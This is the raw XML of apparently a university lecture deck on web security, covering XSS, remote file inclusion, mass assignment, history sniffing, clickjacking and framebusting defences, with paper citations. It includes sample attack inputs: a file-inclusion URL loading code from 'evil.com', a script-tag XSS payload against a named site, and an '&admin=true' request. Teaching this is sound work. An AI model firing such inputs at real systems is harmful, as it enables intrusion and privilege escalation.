        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19463" name="Picture 7" descr="http://media.django.es.s3.amazonaws.com/nuevo/images/djangopo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97" y="3490332"/>
            <a:ext cx="2238375" cy="14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9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 – XSS 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Rails HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Templating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6966" y="2133600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Welcome to the site &lt;%=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%&gt;!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7054" y="4999672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Welcome to the site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lt;b&amp;gt;jburket&amp;lt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b&amp;gt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7143" y="4050268"/>
            <a:ext cx="42370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“&lt;b&gt;jburket&lt;/b&gt;”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43401" y="3366453"/>
            <a:ext cx="533400" cy="595947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335518" y="4585653"/>
            <a:ext cx="533400" cy="595947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177911"/>
            <a:ext cx="1171903" cy="139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42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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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pic>
        <p:nvPicPr>
          <p:cNvPr id="20482" name="Picture 2" descr="http://media.tumblr.com/2aeb3a94ca2d9b681ee1f36b9a306bd2/tumblr_inline_mh0yjeVAmz1r5o3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9" y="1371600"/>
            <a:ext cx="2707925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7979" y="4953000"/>
            <a:ext cx="6185165" cy="919401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Increased automation in web frameworks can introduce new vulnerabilities </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="463321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File Inclusion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97403"/>
            <a:ext cx="5376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$_GET['COLOR'] ) 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include( $_GET['COLOR'] . '.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8" name="Picture 10" descr="http://www.planet-source-code.com/vb/2010Redesign/images/LangugeHomePages/PH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70426"/>
            <a:ext cx="1651588" cy="86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" y="6471854"/>
            <a:ext cx="516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from wikipedia.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>File_inclusion_vulnerability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197293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colors.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1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665296"/>
            <a:ext cx="591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colors.php?COLOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=red” will include contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>red.php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2451" y="4071197"/>
            <a:ext cx="610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colors.php?COLOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=blue” will include contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>blue.php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2451" y="4508536"/>
            <a:ext cx="801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colors.php?COLOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=/hidden/dangerous” will include /hidden/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dangerous.php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219" y="4945875"/>
            <a:ext cx="810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“/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>colors.php?COLOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=http://evil.com/bad” will include http://evil.com/bad.php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90700" y="5561141"/>
            <a:ext cx="5562600" cy="685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Perfect for executing an XSS attack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7209627" y="3200400"/>
            <a:ext cx="1714500" cy="1308136"/>
          </a:xfrm>
          <a:prstGeom prst="down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Local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42563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 Assignment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746" y="1174453"/>
            <a:ext cx="1857703" cy="221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http://www.elevenwinds.com/Images/Vince/data-validation-in-mvc-database-first/ASP.NET-MVC-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0199" y="3386004"/>
            <a:ext cx="3352801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69511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Images from : http://asciicasts.com/episodes/206-action-mailer-in-rails-3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23556" name="Picture 4" descr="The user registration form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1303283"/>
            <a:ext cx="36195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516" y="2466201"/>
            <a:ext cx="6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jburket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516" y="2948152"/>
            <a:ext cx="1357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jburket@cmu.edu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579393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users_new.rb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[:post]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169978" y="4716449"/>
            <a:ext cx="4593022" cy="1143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5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form_data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{:name =&gt; “jburket”,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:email =&gt; “jburket@cmu.edu”}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114711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 Assignment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69511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Images from : http://asciicasts.com/episodes/206-action-mailer-in-rails-3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23556" name="Picture 4" descr="The user registration form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" y="1303283"/>
            <a:ext cx="24384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516" y="2466201"/>
            <a:ext cx="66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jburket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516" y="2948152"/>
            <a:ext cx="1357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jburket@cmu.edu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579393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users_new.rb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[:post]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User.new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form_data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112171" y="4605218"/>
            <a:ext cx="4593022" cy="14515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5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form_data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{:name =&gt; “jburket”,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:email =&gt; “jburket@cmu.edu”,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:admin =&gt; true}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2668" y="1318764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Host: railsapp.com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name=jburket&amp;email=jburket@cmu.edu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241234" y="1437529"/>
            <a:ext cx="838200" cy="68580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4861" y="2954429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new_user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Host: railsapp.com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name=jburket&amp;email=jburket@cmu.edu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&amp;admin=true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181600" y="2229214"/>
            <a:ext cx="802834" cy="70605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8911" y="2377931"/>
            <a:ext cx="90776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Modify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90401" y="3111272"/>
            <a:ext cx="7315200" cy="794846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Admin user created!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85234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5" grpId="0"/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3380" y="2095177"/>
            <a:ext cx="7117620" cy="753670"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious Servers and Browser Security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971800"/>
            <a:ext cx="1600200" cy="2304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88707"/>
            <a:ext cx="2182611" cy="12704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38500" y="3757379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38500" y="4123944"/>
            <a:ext cx="2819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4409" y="455667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3429000"/>
            <a:ext cx="4953000" cy="20574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History Probing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Experimenting with visited links (the ':visited' CSS pseudo-clas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95400"/>
            <a:ext cx="6019800" cy="1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66" y="6368534"/>
            <a:ext cx="845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http://matthewjamestaylor.com/blog/experimenting-with-visited-links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4561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</a:rPr>
              <a:t>http://www.google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.facebook.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.twitter.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.facebook.com/group?id=12345</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.facebook.com/group?id=98765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979" y="3552033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evil.com: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0" y="3429000"/>
            <a:ext cx="2514600" cy="1208841"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -141209"/>
              <a:gd name="adj2" fmla="val 29325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 has visited Google, Facebook and the Facebook Group 12345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096000" y="4823610"/>
            <a:ext cx="2514600" cy="1208841"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -78095"/>
              <a:gd name="adj2" fmla="val -20234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 has NOT visited Twitter or Facebook Group 98765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5638800"/>
            <a:ext cx="5562600" cy="609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Attacker uses JavaScript + CSS to check which links are visited</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3556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“Like” button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55" y="1770511"/>
            <a:ext cx="3421994" cy="1117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241" y="1232658"/>
            <a:ext cx="4672959" cy="537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1" y="1939250"/>
            <a:ext cx="4354460" cy="56887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90240" y="3056467"/>
            <a:ext cx="8191869" cy="641221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Like button knows about your Facebook session!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0" y="4014317"/>
            <a:ext cx="8069739" cy="2438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5683188" y="4298647"/>
            <a:ext cx="838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112645" y="5215495"/>
            <a:ext cx="2667000" cy="1237221"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44134"/>
              <a:gd name="adj2" fmla="val -96078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Appears in “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mashup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” with content from other domains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2403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“Reflected”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br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server reflects back </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-laced input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Attack delivery method: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send victims a link containing XSS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1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“Like” button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Like Button Requirements:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Needs to access cookie for domain facebook.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Can be deployed on domains other than facebook.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Other scripts on the page should not be able to click Like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76374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57200" y="5715000"/>
            <a:ext cx="8001000" cy="77787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 need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>isolate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the Like button from the rest of the page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21007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8" y="1143000"/>
            <a:ext cx="4088365" cy="2533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>
          <a:xfrm>
            <a:off x="4897120" y="1159961"/>
            <a:ext cx="3291840" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="left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Parent page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Left Arrow 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="2250440"/>
            <a:ext cx="3769360" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="left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Embedded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8" y="3962400"/>
            <a:ext cx="4088365" cy="2627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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4389120" y="4978216"/>
            <a:ext cx="3769360" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="left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Any page can be embedded</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2535344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4094492" cy="253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35" y="1422401"/>
            <a:ext cx="3986765" cy="25624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2971800" y="167640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166370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9200" y="162306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50200" y="1610360"/>
            <a:ext cx="0" cy="10399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4049145"/>
            <a:ext cx="40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Pages share same domain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23835" y="4053486"/>
            <a:ext cx="398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Pages do not share same domain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Multiply 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010412" y="1610360"/>
            <a:ext cx="1468108" cy="986599"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply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4953000"/>
            <a:ext cx="7620000" cy="132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u="sng" dirty="0"/>
              <a:t>same-origin policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> states that the DOM from one domain should not be able to access the DOM from a different domain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00224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“Like” button work?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0" y="1295400"/>
            <a:ext cx="8069739" cy="2438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91200" y="1828801"/>
            <a:ext cx="0" cy="236219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1314" y="3242310"/>
            <a:ext cx="8205486" cy="163449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id="f5b9bb75c" name="f2f3fdd398" scrolling="no" title="Like this content on Facebook." class="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fb_ltr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="http://www.facebook.com/plugins/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like.php?api_key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=116656161708917..." style="border: none; overflow: hidden; height: 20px; width: 80px;"&gt;&lt;/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1314" y="5147309"/>
            <a:ext cx="8205486" cy="1143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same-origin policy prevents the host from clicking the button and from checking if it’s clicked</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16726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97280" y="1538468"/>
            <a:ext cx="6934200" cy="1524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same-origin policy prevents malicious sites from clicking their own “Like” button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1180" y="3378581"/>
            <a:ext cx="5486400" cy="1143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What if the site can trick you into clicking it yourself?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15044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Clickjacking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92262" y="3702049"/>
            <a:ext cx="3200400" cy="12668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Click for a FREE iPad!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050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6208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565008"/>
            <a:ext cx="546721" cy="835792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 5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err="1">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Clickjacking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occurs when a malicious site tricks the user into clicking on some element on the page unintentionally.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8394" y="6158531"/>
            <a:ext cx="885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modeled after presentation by Lin-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Shung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Huang at USENIX 2012.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Paper: Lin-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Shung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Huang, Alex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Moshchuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, Helen J. Wang, Stuart Schechter, and Collin Jackson. 2012. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>: attacks and defenses. In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0"/>
              <a:t>Proceedings of the 21st USENIX conference on Security symposium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> (Security'12). USENIX Association, Berkeley, CA, USA, 22-22.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31383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0.00486 -0.1969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9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1.48148E-6 L 0.46041 -0.00347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Clickjacking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16062" y="2306910"/>
            <a:ext cx="3200400" cy="12668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Click for a FREE iPad!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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1069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69869"/>
            <a:ext cx="546721" cy="83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69869"/>
            <a:ext cx="546721" cy="835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2274" y="5530334"/>
            <a:ext cx="1789174" cy="510778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Fake Cursor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8926" y="5530334"/>
            <a:ext cx="1745644" cy="510778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Real Cursor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39480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48148E-6 L 0.00348 -0.224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1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0.00347 -0.224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Clickjacking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16062" y="2306910"/>
            <a:ext cx="3200400" cy="126682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Click for a FREE iPad!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2" descr="http://chrisblattman.com/files/2011/07/facebook_like_button_big1-300x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1069"/>
            <a:ext cx="2857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69869"/>
            <a:ext cx="546721" cy="835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92274" y="5530334"/>
            <a:ext cx="1789174" cy="510778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Fake Cursor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8926" y="5530334"/>
            <a:ext cx="2768163" cy="510778"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -32087"/>
              <a:gd name="adj2" fmla="val -11857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Real Cursor Hidden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334079"/>
            <a:ext cx="4804114" cy="510778"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -27891"/>
              <a:gd name="adj2" fmla="val 10777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is the button that gets clicked!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55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0.00347 -0.224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Clickjacking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07" y="1719648"/>
            <a:ext cx="7225311" cy="338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96000"/>
            <a:ext cx="8674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Lin-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Shung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Huang, Alex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Moshchuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, Helen J. Wang, Stuart Schechter, and Collin Jackson. 2012. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: attacks and defenses. In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>Proceedings of the 21st USENIX conference on Security symposium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> (Security'12). USENIX Association, Berkeley, CA, USA, 22-22.</a:t>
            </a:r>
          </a:p>
          <a:p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45363" y="2819400"/>
            <a:ext cx="8229600" cy="1066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Malicious site now has access to your webcam!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81532" y="5373225"/>
            <a:ext cx="29718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Work done at CMU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22885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Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Mitigation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95400"/>
            <a:ext cx="5334000" cy="363850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7439" y="5181600"/>
            <a:ext cx="6858000" cy="8382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Adding a delay between a button appearing and being usable helps prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Clickjacking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36" y="1117124"/>
            <a:ext cx="9251472" cy="4140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749" y="5230192"/>
            <a:ext cx="7784502" cy="10215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 through 2009: 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www.lapdonline.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search_terms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=&lt;script&gt;alert(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(example attack: send phish purporting link offers free Anti-virus)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293514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Frames for Evil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01" y="2989507"/>
            <a:ext cx="4153099" cy="1353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901" y="5016376"/>
            <a:ext cx="4153099" cy="1460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901" y="1189001"/>
            <a:ext cx="4153099" cy="11847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92" y="1189001"/>
            <a:ext cx="3150861" cy="201139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6343550" y="2430190"/>
            <a:ext cx="685800" cy="44565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332663" y="4425978"/>
            <a:ext cx="685800" cy="44565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933396" y="1544788"/>
            <a:ext cx="551592" cy="468741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85743" y="3429000"/>
            <a:ext cx="3047653" cy="3048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If pages with sensitive buttons can be put in an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, then it may be possible to perform a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31610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349" y="1159389"/>
            <a:ext cx="8206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 err="1">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Framebusting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  <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>is a technique where a page stops functioning when included in a frame.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" i="1" u="sn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621174" y="2522538"/>
            <a:ext cx="7901651" cy="1371600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&lt;script type="text/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"&gt;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if(top != self) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>top.location.replace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self.location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882086" y="4143731"/>
            <a:ext cx="7379826" cy="2097621"/>
          </a:xfrm>
          <a:prstGeom prst="upArrowCallou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If the page with this script is embedded in a frame, then it will escape out of the frame and replace the embedding page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16727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1945727"/>
            <a:ext cx="2133600" cy="2209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Don’t roll your own crypto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945727"/>
            <a:ext cx="2133600" cy="22263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Don’t write your own sanitization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38400" y="2666999"/>
            <a:ext cx="914400" cy="767255"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 38177"/>
              <a:gd name="adj2" fmla="val 50000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86400" y="2675252"/>
            <a:ext cx="914400" cy="767255"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 38177"/>
              <a:gd name="adj2" fmla="val 50000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53200" y="1943906"/>
            <a:ext cx="2133600" cy="2209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Don’t write your own </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>framebusting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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97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Framebusting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is Complicated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272" y="2483948"/>
            <a:ext cx="4414606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Fails if page is embedded two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> deep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257308"/>
            <a:ext cx="4495800" cy="981754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if(top.location!=self.location)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parent.location=self.location;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304800" y="3137457"/>
            <a:ext cx="6858000" cy="981754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if(top != self)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top.location.replace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self.location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0851" y="4354010"/>
            <a:ext cx="7971349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If the embedding page sets the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onBeforeUnload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> event, the script can be blocked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5029200"/>
            <a:ext cx="3447619" cy="16190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88122" y="4958172"/>
            <a:ext cx="4749478" cy="1021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If the embedding page makes lots of requests that return “204 – No Content” responses, we don’t even need the dialog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8122" y="6097718"/>
            <a:ext cx="5155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Rydstedt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, Gustav, et al. "Busting frame busting: a study of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> vulnerabilities at popular sites." </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>IEEE Oakland Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> 2 (2010).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 animBg="1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Framebusting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is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54</a:t>
